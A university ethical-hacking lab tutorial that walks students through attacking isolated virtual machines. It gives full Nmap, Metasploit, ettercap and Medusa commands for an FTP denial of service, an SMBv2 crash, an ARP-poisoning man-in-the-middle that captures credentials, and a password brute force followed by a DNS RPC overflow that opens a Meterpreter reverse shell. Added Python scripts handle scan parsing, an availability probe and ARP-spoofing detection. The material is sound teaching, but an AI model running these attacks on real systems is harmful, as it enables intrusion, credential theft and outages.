Ethical Hacking Tutorial

Uploaded by sawna-murmu on 22-Feb-2015 (24 pages).

TRANSCRIPT

Page 1: Ethical Hacking Tutorial

UNIVERSITY OF DERBY

1 | Page

Hacking in Action – Tutorial

Background

Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well as the survey which you will be asked to complete following this session, will contribute to a dissertation investigating the feasibility of using virtual environments to teach ethical hacking in educational institutions.

Hacking is a very delicate subject when studying IT security; however, it is widely argued that the best defensive measures come from understanding how services are infiltrated and disrupted. This tutorial, although highly simplified, therefore puts you in the seat of an ethical attacker who is employed to test the defensive measures in place on a corporate network. Its purpose is to provide a conceptual understanding of both the mentality and the techniques used by an ethical hacker.

The tutorial begins by starting four virtual machines found on the local computer. You will be using a well-recognised suite of tools used by professional security consultants, collated into a Linux distribution known as BackTrack. Once all of the virtual machines have fully loaded and you have logged into BackTrack, you will use a tool known as Nmap to conduct reconnaissance on the local network in order to determine the IP (Internet Protocol) addresses of hosts connected to the local subnet. Nmap will also be used to discover the Operating System (OS) used by each host and their respective services (indicated by banners and port numbers). Once the local network is mapped and sufficient knowledge of each host is ascertained, you will move on to use the Metasploit Framework to conduct four attacks. These attacks will involve:

- Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol (FTP) server.

- Exploiting an out-of-bounds function table dereference in Server Message Block (SMB) requests, causing a Blue Screen of Death (BSoD).

- Poisoning Address Resolution Protocol (ARP) caches in order to intercept Secure Sockets Layer (SSL) traffic and obtain a user's credentials, better known as a Man-in-the-Middle (MITM) attack.

- Using a brute-force tool to discover the password of an administrator account, and then obtaining root (SYSTEM-level) access to that server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain Name System (DNS) service. The root access will then be used to enable Remote Desktop on the server and open a graphical session on it (the steps below use rdesktop for this rather than a Virtual Network Computing (VNC) client).

This tutorial is designed to be enjoyable but also educational, and you are reminded that it is a criminal offence to repeat these attacks without written authorisation from the organisation and the individuals involved. Finally, due to the nature of this study, although the virtual machines are completely isolated and unable to communicate with the University network or the public network, monitoring software is in use to ensure that any attempts to breach these security measures are logged.

Prelude

To begin, please open the team of virtual machines in VMware Workstation:

1. Click the Windows 'Start' button.

2. Go to 'Computer' and open the root drive (C:\). Locate and open the 'StudentVMs' folder, followed by 'STUART BUTCHER' and finally 'Hacking_Final'.

3. The 'Hacking_Final' folder contains all of the virtual machines needed for this tutorial. Begin the tutorial by double-clicking the 'Hacking_Final.vmtm' file.

4. You will be greeted with the 'VMware Workstation' application displaying the 'Hacking_Final' team tab. This contains all of the virtual machines.

5. With the team open, click 'Power on this team' in the 'Commands' box. This will start the boot-up process. The servers start up in a particular order and take approximately 5 minutes before they are ready for use.

6. The virtual machines are ready for use when they display the 'Press Ctrl-Alt-Delete to logon' screen. To change between virtual machines, select them in the management panel above the console. Please be aware that if you are actively using a virtual machine, i.e. controlling its mouse, you will need to press 'CTRL + ALT' to return to the host.

Reconnaissance

The first task is to determine what else is on the local network and what each active host is responsible for. To do this, we will be using a tool known as Nmap, included with BackTrack.

1. In the VMware Workstation window, take control of the 'ATTACKER' virtual machine by selecting it from the management panel above the console.

2. Click the mouse anywhere on the virtual machine console window to take control of it. You will see a prompt 'bt login:' at the bottom of the window. Type the username 'attacker' and press return. You will be asked for the password, which is 'attacker'. You will not be able to see the password input. If you enter it incorrectly, you will need to repeat the process.

3. Following a successful log on, the graphical user interface will populate and a shell window will automatically appear.

4. If a shell window does not automatically appear, click the 'Konsole' application icon on the bottom menu bar.

5. Before it is possible to discover other devices on the local subnet, the attacker needs to know which subnet they belong to. To do this, type 'ifconfig eth0' into the shell window and press return.

6. Take a note of the IP address and subnet mask.

7. The local IP address is 172.172.1.10 with a subnet mask of 255.255.255.0 (a /24 prefix). This means that the network address must be 172.172.1.0. Therefore, to discover other devices within the subnet, type 'sudo nmap -sP 172.172.1.0/24' into the shell window. '-sP' is a ping scan: it lists the hosts that are up without port-scanning them (newer Nmap releases call the same option '-sn'). The 'sudo' command runs the command with administrative privileges, which Nmap needs in order to send raw ARP and ICMP probes, and you may therefore be prompted for a password. If this happens, type 'attacker'. Please note, all commands are case sensitive.

8. Nmap has revealed four hosts that are up on the local subnet. One of them (172.172.1.10) is BackTrack itself, leaving three other clients:

a. 172.172.1.20

b. 172.172.1.100

c. 172.172.1.101

9. With the IP addressing information ascertained, it is now possible to acquire brief details of what services each host is responsible for. To do this, type 'sudo nmap -v -O {Target IP}'.

10. From the targeted scan, Nmap reveals the Operating System, the network interface card MAC address, and the open ports. The ports indicate the services running on the target. Repeat the scan for the remaining hosts.

(Screenshot callouts: Open Ports; Services used by ports; Network Interface Card MAC; Operating System Information.)

11. Although there is now a basic understanding of which ports and services are in use, it is possible to obtain more detailed information by interrogating the services themselves. For example, the virtual machine with IP address 172.172.1.101 indicates it is running Internet Information Services (IIS) to power its web server, but it does not advertise which version. To discover the version of IIS, type 'sudo nmap -A -T4 -F 172.172.1.101' ('-A' enables OS detection, service version detection and the default scripts, '-T4' uses a faster timing template, and '-F' limits the scan to the 100 most common ports). Repeat the scan on the remaining hosts.

With some FTP servers, it is possible to gain specific system information by connecting to the server using Telnet (e.g. 'telnet 172.172.1.101 21') and typing 'SYST'; a Microsoft FTP Service answers '215 Windows_NT'.
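As an added example (not part of the original tutorial), the Python below automates the bookkeeping of steps 5 to 11: it derives the /24 target from the output of 'ifconfig eth0' exactly as step 7 reasons it out, parses Nmap's grepable output ('-oG -') into a per-host summary of OS and open services, and produces the follow-up scan commands for every host other than the attacker. The ifconfig and Nmap output embedded in it is constructed to match the lab's addressing, not captured from the lab, and the MAC address in it is a placeholder.

```python
import ipaddress
import re
import subprocess

# Constructed sample of 'ifconfig eth0' on BackTrack (not captured from the lab; the
# MAC address is a placeholder).
IFCONFIG_ETH0 = """eth0      Link encap:Ethernet  HWaddr 00:0c:29:12:34:56
          inet addr:172.172.1.10  Bcast:172.172.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
"""

# Constructed sample of Nmap grepable output (-oG) for the lab hosts. Real output has
# 'Host:' lines with tab-separated 'Field: value' columns; each port entry is
# port/state/proto/owner/service/rpc/version/.
NMAP_GREPABLE = """# Nmap scan initiated as: nmap -O -oG - 172.172.1.0/24
Host: 172.172.1.10 ()\tStatus: Up
Host: 172.172.1.10 ()\tPorts: 22/open/tcp//ssh///\tOS: Linux 2.6.X
Host: 172.172.1.20 ()\tStatus: Up
Host: 172.172.1.20 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (997)\tOS: Microsoft Windows XP SP2 or SP3
Host: 172.172.1.100 ()\tStatus: Up
Host: 172.172.1.100 ()\tPorts: 25/open/tcp//smtp///, 53/open/tcp//domain///, 80/open/tcp//http///, 389/open/tcp//ldap///, 443/open/tcp//https///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows Server 2003
Host: 172.172.1.101 ()\tStatus: Up
Host: 172.172.1.101 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows Server 2008
"""


def subnet_from_ifconfig(text):
    """Step 7 as code: address AND mask gives the network address, the mask gives the
    prefix length. Returns e.g. '172.172.1.0/24'."""
    m = re.search(r"inet addr:(\S+)\s+.*?Mask:(\S+)", text)
    if not m:
        raise ValueError("no IPv4 address/mask found in ifconfig output")
    return str(ipaddress.ip_interface(f"{m.group(1)}/{m.group(2)}").network)


def parse_grepable(text):
    """Parse Nmap -oG output into {ip: {"os": str | None, "ports": [(port, proto, service)]}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        entry = hosts.setdefault(ip, {"os": None, "ports": []})
        if "OS" in fields:
            entry["os"] = fields["OS"]
        for item in fields.get("Ports", "").split(","):
            parts = item.strip().split("/")
            if len(parts) >= 5 and parts[1] == "open":
                entry["ports"].append((int(parts[0]), parts[2], parts[4]))
    return hosts


def other_hosts(hosts, own_ip):
    """Step 8: every host that answered except the attacker's own address, in address order."""
    return sorted((ip for ip in hosts if ip != own_ip), key=ipaddress.ip_address)


def scan_commands(hosts, own_ip):
    """Steps 9 and 11: the per-host Nmap commands from the tutorial, as argv lists."""
    cmds = []
    for ip in other_hosts(hosts, own_ip):
        cmds.append(["sudo", "nmap", "-v", "-O", ip])
        cmds.append(["sudo", "nmap", "-A", "-T4", "-F", ip])
    return cmds


def nmap_grepable(args):
    """Run Nmap for real and return grepable output. Only appropriate on the isolated lab subnet."""
    out = subprocess.run(["sudo", "nmap", "-oG", "-", *args],
                         check=True, capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    cidr = subnet_from_ifconfig(IFCONFIG_ETH0)
    found = parse_grepable(NMAP_GREPABLE)          # on the lab: parse_grepable(nmap_grepable(["-O", cidr]))
    print("target network:", cidr)
    for ip in other_hosts(found, "172.172.1.10"):
        ports = ", ".join(f"{p}/{proto} {svc}" for p, proto, svc in found[ip]["ports"])
        print(f"{ip:15} {found[ip]['os']!s:40} {ports}")
    for cmd in scan_commands(found, "172.172.1.10"):
        print(" ".join(cmd))
```

Run as-is it only works on the embedded sample; swapping the sample for nmap_grepable(["-sP", cidr]) and nmap_grepable(["-O", ip]) calls reproduces the tutorial's scans against the lab.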

Attacks

With the knowledge now gained about the other hosts on the local subnet, it is possible to find vulnerabilities on each. Discovered vulnerabilities are publicised on the National Vulnerability Database (NVD) under CVE identifiers, to help administrators protect their systems and vendors to update their software. The information gathered about each host, and the potential vulnerabilities available to be exploited, is shown below.

172.172.1.20 – VICT-CLI01

This host is using Windows XP SP2 or SP3, which may make it vulnerable to a relative path stack corruption in the Server service (the path canonicalisation flaw described in CVE-2008-4250, MS08-067), which could result in obtaining root (SYSTEM-level) access.

172.172.1.100 – VICT-SRV01

172.172.1.100 appears to be responsible for DNS, Active Directory, a web service, and e-mail. It is also using the Windows Server 2003 Operating System. Therefore, this host may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-2007-1748, MS07-029). Additionally, as this host also appears to be responsible for e-mail services, it could be possible to conduct a Man-in-the-Middle attack on the secure HTTP traffic when a user logs in to their mailbox.

172.172.1.101 – VICT-SRV-WEB1

This virtual machine appears to have two interesting services: FTP and HTTP. This suggests that the server is hosting one or more web pages as well as providing a file download/upload service. Additionally, it is clear that the server is using a Server 2008 based Operating System.

As this host is using IIS 7.0, it is likely that the FTP server is the separately installed FTP 7.5 for IIS 7.0. Therefore, it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further to this, Nmap has indicated that it is using SMBv2, which is known to be vulnerable to an array index error when an ampersand character ('&') is supplied in the Process ID High field of a NEGOTIATE PROTOCOL REQUEST. This triggers an attempted dereference of an out-of-bounds memory location and consequently results in a Blue Screen of Death (CVE-2009-3103, MS09-050).

IIS FTP 7.5 DoS

It is possible to terminate the FTP service on a Windows server if it is running FTP 7.5 (CVE-2010-3972, MS11-004). The vulnerability lies in the way the service encodes its responses: 0xFF is the Telnet IAC (Interpret As Command) byte, so the server escapes each 0xFF it echoes back by doubling it, and when a long string of 0xFF bytes is supplied the encoder carries on past the end of the heap buffer that holds the response, producing a heap buffer overrun that crashes the service. This can be demonstrated in the Metasploit Framework.

1. Change control of the virtual machines to 'VICT-SRV-WEB1'. If control is currently focused on a different virtual machine, then press 'CTRL+ALT'. This will return control to the host computer.

2. Log in by hitting 'CTRL+ALT+INSERT' and typing 'H4ckM3!' as the password.

3. Once logged in, click the 'Start' button and type 'services.msc' into the search bar, followed by hitting the return key.

4. A window containing all system services will be populated. Scroll through the list of services to find 'Microsoft FTP Service'. It will show the service as 'Started'.

5. Change control back to the 'ATTACKER' virtual machine and open a shell window.

6. Verify that it is possible to connect to the FTP server by typing 'ftp 172.172.1.101'. If the FTP server is running and accepting new connections then it will display the welcome banner ('220 Microsoft FTP Service') and will prompt for a login name.

7. Hit return twice and then type 'quit'.

8. Type 'sudo msfconsole'. If prompted for a password, enter 'attacker'. It may take a short while to load.

9. Select the module to be used by typing 'use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof' followed by hitting the return key.

10. Next, select the target by typing 'set RHOST 172.172.1.101'.

11. Launch the attack by typing 'run'.

12. The attack will be launched. A completion message will be returned following the execution.

13. Change back to 'VICT-SRV-WEB1' and refresh the 'Services' window. Do not close the shell window on BackTrack.

14. Find 'Microsoft FTP Service' and notice that it is no longer 'Started'.

The FTP service is no longer running. The attack has been successful. (Repeating step 6 from the attacker is an equally valid check: the connection is now refused instead of returning the 220 banner.)
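Steps 6 and 7, together with the SYST tip from the reconnaissance section, can be scripted so that the same check is run before and after the attack. The Python below is an added example, not part of the tutorial: ftp_probe() connects, reads the 220 banner, sends SYST and QUIT, and returns None when the service refuses the connection, which is the same before/after difference the services.msc window shows. StubFtpServer is a constructed stand-in for the Microsoft FTP Service so the probe can be exercised offline; against the lab the call would be ftp_probe('172.172.1.101').

```python
import socket
import threading


def _readline(conn, limit=1024):
    """Read one LF-terminated line from a socket; None if the peer closed the connection."""
    buf = bytearray()
    while len(buf) < limit:
        ch = conn.recv(1)
        if not ch:
            return None
        buf += ch
        if ch == b"\n":
            break
    return bytes(buf)


def ftp_probe(host, port=21, timeout=3.0):
    """Steps 6/7 as code: connect, read the greeting, ask SYST, quit.
    Returns (banner, syst_reply) when the service is up, or None when the connection
    is refused, times out, or the greeting is not a 220."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            banner = _readline(s)
            if banner is None or not banner.startswith(b"220"):
                return None
            s.sendall(b"SYST\r\n")
            syst = _readline(s) or b""
            s.sendall(b"QUIT\r\n")
            return (banner.decode(errors="replace").strip(),
                    syst.decode(errors="replace").strip())
    except OSError:  # covers ConnectionRefusedError and socket.timeout
        return None


class StubFtpServer:
    """Constructed stand-in for 'Microsoft FTP Service' (not the real server) speaking
    just enough FTP for ftp_probe(): a 220 greeting, SYST, QUIT, and 530 for anything else."""

    def __init__(self, host="127.0.0.1"):
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.bind((host, 0))        # port 0: let the OS pick a free port
        self._srv.listen(5)
        self._srv.settimeout(0.2)        # so the accept loop notices stop()
        self.host, self.port = self._srv.getsockname()
        self._running = True
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while self._running:
            try:
                conn, _ = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with conn:
                conn.settimeout(3.0)
                conn.sendall(b"220 Microsoft FTP Service\r\n")
                while True:
                    try:
                        line = _readline(conn)
                    except socket.timeout:
                        break
                    if line is None:
                        break
                    cmd = line.strip().upper()
                    if cmd == b"SYST":
                        conn.sendall(b"215 Windows_NT\r\n")
                    elif cmd == b"QUIT":
                        conn.sendall(b"221 Goodbye.\r\n")
                        break
                    else:
                        conn.sendall(b"530 Please login with USER and PASS.\r\n")

    def stop(self):
        """Simulate the outcome of the DoS: the listener goes away and connections are refused."""
        self._running = False
        self._thread.join()
        self._srv.close()


def service_survived(host, port=21):
    """Before/after check to wrap around the attack: True while the 220 greeting is still served."""
    return ftp_probe(host, port) is not None


if __name__ == "__main__":
    stub = StubFtpServer()
    print("before:", ftp_probe(stub.host, stub.port))
    stub.stop()
    print("after: ", ftp_probe(stub.host, stub.port))
```

The probe deliberately stops at SYST and QUIT: it never sends credentials, so it can be run against a production FTP service as an availability check without creating logon events.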

Server Message Block (SMB) Blue Screen of Death (BSoD)

The reconnaissance also identified that 'VICT-SRV-WEB1' uses SMBv2, which has a known vulnerability (CVE-2009-3103). A reliable exploit of this vulnerability would allow an attacker to execute code with SYSTEM-level privileges; a failed attempt instead crashes the kernel, resulting in a Denial of Service. The Metasploit module used here is an auxiliary DoS module: it deliberately sends only the malformed negotiate request and makes no attempt at code execution, so the outcome is the crash rather than a shell.

1. On BackTrack, from the shell window used previously, type 'use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh'. If you closed the shell window, open a new window and type 'sudo msfconsole' to start Metasploit again.

2. Set the target by entering 'set RHOST {Target IP}'.

3. Execute the attack by typing 'run'.

4. When the attack completes, change to the 'VICT-SRV-WEB1' virtual machine.

5. The virtual machine should be displaying a Blue Screen of Death. By examining the error, it is possible to see that the attack dereferenced an out-of-bounds memory location.

6. Return to the 'ATTACKER' and type 'exit'.

The victim will automatically reboot. The attack has been successful.

Secure Sockets Layer (SSL) Man-in-the-Middle Attack

Nmap revealed that there is an XP machine on the network. This is most likely a user's computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is possible to poison the client's ARP cache so that its traffic for the mail server is sent to the attacker instead, and to sniff that traffic in order to intercept the SSL data by acting as a middle-man. Because the attacker does not hold the mail server's private key, the certificate presented to the client during the interception is a substitute with a different issuer; for a user already accustomed to clicking through a warning for the server's own certificate, that change of issuer is the only visible sign of the attack.

1. Change control to 'VICT-CLI01' and press 'CTRL+ALT+INSERT'. Enter 'thevictim' as the username and 'Password01' as the password.

2. Click the 'Start' button and open 'Internet Explorer'.

3. When the page begins to load, a security alert window will appear. Click 'View Certificate'.

4. The certificate will display three tabs: 'General', 'Details', and 'Certification Path'. Open the 'Details' tab.

5. The details tab contains all of the information relating to the site certificate. Take a note of the 'Issuer' and the information within the text box below.

6. Click 'OK' and then click 'Yes' on the security alert window.

7. Enter the username 'thevictim' and password 'Password01'. Then click 'Log On'.

8. The user's inbox will now be displayed. Click 'Log Off' and then close the window.

10. Change control to the 'ATTACKER' and from within a shell window type 'sudo ettercap -Tq -i eth0 -M arp:remote,oneway /172.172.1.20/ /172.172.1.100/'. If prompted, enter the password 'attacker'. ('-T' selects the text interface, '-q' keeps it quiet, '-i eth0' chooses the interface, and '-M arp:remote,oneway' poisons only the first target's ARP cache, the client, with a spoofed entry for the second, the mail server.)

11. The client's ARP cache is now being poisoned. Change back to 'VICT-CLI01'. If the virtual machine is locked, press 'CTRL+ALT+INSERT' and type 'thevictim' for the username and 'Password01' for the password.

12. Click the 'Start' button and open 'Internet Explorer'. When the security alert window displays, click 'View Certificate'.

13. Click the 'Details' tab and take a note of the 'Issuer'.

14. The difference in issuer demonstrates that SSL traffic is being intercepted.

15. Click 'OK' and then 'Yes' to continue loading the web page.

16. Enter the username 'thevictim' and password 'Password01' on the login page and then click 'Log On' to load the user's inbox.

17. Once successfully logged in, change control back to 'ATTACKER' and notice that the user's details are printed to the display of the shell window.

18. In the shell window, type 'q' and the sniffing and poisoning will terminate.

19. Return to 'VICT-CLI01' and click 'Log off'. If the virtual machine is locked, enter 'thevictim' as the username and 'Password01' as the password.

20. Shut down the 'VICT-CLI01' virtual machine by clicking the 'Start' button and then 'Shut down'. Click 'OK' on the next window.

That concludes the Man-in-the-Middle attack.
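The user-side symptom in steps 13 and 14 is the changed certificate issuer; the network-side symptom is the client's ARP cache, where the mail server's IP suddenly resolves to the attacker's MAC, the same MAC that legitimately answers for 172.172.1.10. The Python below is an added example, not part of the tutorial, that compares two 'arp -a' snapshots taken on VICT-CLI01 before and after step 10 and reports both signs, plus an optional pinned entry for the mail server so the spoof is caught even without an earlier snapshot. The snapshots and MAC addresses are constructed to match the lab layout, not captured from it.

```python
import re

# Constructed 'arp -a' snapshots from the XP client. The MAC addresses are placeholders,
# chosen so that ARP_AFTER shows what ettercap's one-way poisoning of the client produces:
# the mail server (.100) now resolves to the MAC that also answers for the attacker (.10).
ARP_BEFORE = """
Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-aa-aa     dynamic
  172.172.1.100         00-0c-29-bb-bb-bb     dynamic
  172.172.1.101         00-0c-29-cc-cc-cc     dynamic
"""

ARP_AFTER = """
Interface: 172.172.1.20 --- 0x2
  Internet Address      Physical Address      Type
  172.172.1.10          00-0c-29-aa-aa-aa     dynamic
  172.172.1.100         00-0c-29-aa-aa-aa     dynamic
  172.172.1.101         00-0c-29-cc-cc-cc     dynamic
"""

# One ARP entry: IPv4 address, MAC in Windows (aa-bb-...) or Linux (aa:bb:...) form, type.
_ENTRY = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>[0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(?P<type>\w+)",
    re.IGNORECASE,
)


def _norm(mac):
    return mac.lower().replace(":", "-")


def parse_arp_table(text):
    """Return {ip: mac} from 'arp -a' (Windows) or 'arp -n' (Linux) output, MACs normalised."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if m:
            table[m.group("ip")] = _norm(m.group("mac"))
    return table


def detect_arp_spoofing(before_text, after_text, pinned=None):
    """Compare two snapshots and return a list of alert strings.

    Checks: (1) an IP whose MAC changed between snapshots, (2) one MAC now claiming
    several IPs, and (3) optionally a pinned {ip: mac} map for critical hosts such as
    the mail server, which fires even if no clean earlier snapshot exists."""
    before = parse_arp_table(before_text)
    after = parse_arp_table(after_text)
    alerts = []

    for ip, mac in sorted(after.items()):
        if ip in before and before[ip] != mac:
            alerts.append(f"MAC for {ip} changed from {before[ip]} to {mac}")

    claims = {}
    for ip, mac in after.items():
        claims.setdefault(mac, []).append(ip)
    for mac, ips in sorted(claims.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")

    for ip, mac in (pinned or {}).items():
        seen = after.get(ip)
        if seen is not None and seen != _norm(mac):
            alerts.append(f"pinned host {ip} expected {_norm(mac)}, table has {seen}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_BEFORE, ARP_AFTER,
                                     pinned={"172.172.1.100": "00-0c-29-bb-bb-bb"}):
        print("ALERT:", alert)
```

A static ARP entry for the mail server on the client (the equivalent of the pinned map) is the classic host-side mitigation for this attack on a small network; on switched networks the same signal is obtained centrally from Dynamic ARP Inspection logs.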

Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission Control Protocol (TCP) Overflow

Nmap identified that the server with IP address 172.172.1.100 is not only an e-mail server, but also responsible for DNS and Active Directory. Unfortunately, Nmap also highlighted that the system is relatively unpatched, and a known vulnerability in that particular OS (and service pack) involves causing a stack buffer overflow in the RPC interface of the DNS service. This is triggered when a long zone name parameter containing escaped octal strings is supplied over TCP. A successful exploit gives root (SYSTEM-level) access. However, in order to take control of the server's graphical user interface, the administrator credentials must be known. For this part, it is assumed that the administrator username is 'Administrator'.

1. On the 'ATTACKER' machine, minimise the shell window if there is one open.

2. On the desktop, there is a file titled 'passwords'. Click on it to open it. When prompted, click 'Open Session'.

3. A text file containing a list of passwords will be displayed.

4. Close this window by clicking the 'X' at the top right of the window.

5. Restore the shell window, or open a new one if there was not one already open.

6. Start the brute-forcing tool known as Medusa by typing 'medusa -h 172.172.1.100 -u Administrator -P /home/attacker/passwords -f -F -M smbnt' followed by the return key ('-h' is the target host, '-u' the single username to try, '-P' the password file, '-M smbnt' the SMB/NT authentication module, and '-f'/'-F' stop as soon as a valid password is found).

7. Medusa will run through all of the passwords in the password text file, checking to see if there is a match. When it finds the correct one, it will display 'SUCCESS'. Note that this kind of online guessing is noisy: every failed attempt is a failed logon event on the server, and on a production domain controller an account lockout policy would lock the account long before a large wordlist is exhausted.

8. Take a note of the password and run Metasploit by typing 'sudo msfconsole'. If prompted for the password, type 'attacker'.

9. When Metasploit has loaded, type 'use exploit/windows/dcerpc/ms07_029_msdns_zonename' and hit return.

10. Select the payload type to be used by typing 'set PAYLOAD windows/meterpreter/reverse_tcp' followed by the return key.

11. Define the address that the reverse Transmission Control Protocol (TCP) payload will connect back to, i.e. the attacker's own address, by typing 'set LHOST 172.172.1.10'.

12. Enter the target address by typing 'set RHOST 172.172.1.100'.

13. Type 'exploit' to execute the attack.

14. If the attack is successful, a Meterpreter session with the server will be established.

15. To enable Remote Desktop on the server so that its screen can be viewed, type 'run getgui -e' in the Meterpreter session.

16. Open a new shell window. When the prompt displays, type 'rdesktop -u Administrator -p H4ckM3! 172.172.1.100' (substituting the password Medusa found, if different) and press return.

17. Once logged in, click 'Start' followed by 'Shut Down'.

18. It is not possible to shut the server down unless a comment is given. In the comment box, press space and then click 'OK'.

19. The server will warn that other users will be disconnected. Click 'Yes' to continue.

20. The server will now begin the shutdown process. Confirm this by changing control to the 'VICT-SRV01' virtual machine.

When the server shuts down, this attack is completed. In a production environment, the loss of the e-mail server and domain controller would result in major disruption to a business.

Cleaning Up

To complete the tutorial, shut down the remaining virtual machines:

1. Take control of 'VICT-SRV-WEB1' and press 'CTRL+ALT+INSERT' to log in. Use the username 'Administrator' and password 'H4ckM3!'.

2. If asked for a reason why the server unexpectedly shut down, hit the spacebar in the comments box followed by 'OK'.

3. Once logged in, click the 'Start' button followed by the right arrow button next to the padlock icon.

4. When 'Shut Down' becomes visible, click it.

5. If asked for a reason for the shutdown, press the spacebar in the comments box and click 'OK'.

6. The server will begin the shutdown sequence. Change control to the 'ATTACKER' virtual machine.

7. Close any shell windows that may be open, and click the far left icon on the menu bar.

8. When the panel displays, click 'Log Out'. Another window will appear. Click 'Log Out' on this new window.

9. Once the graphical user interface has closed, click anywhere in the console window to ensure it is taking keyboard input. Type 'sudo poweroff'. When prompted, enter the password 'attacker'.

10. The system will now begin shutting down. When all virtual machines have shut down, the 'Hacking_Final' home tab will be displayed in 'VMware Workstation'.

Thank you for taking part in this investigation. Please complete the online survey. The password for the survey is 'Attacker'.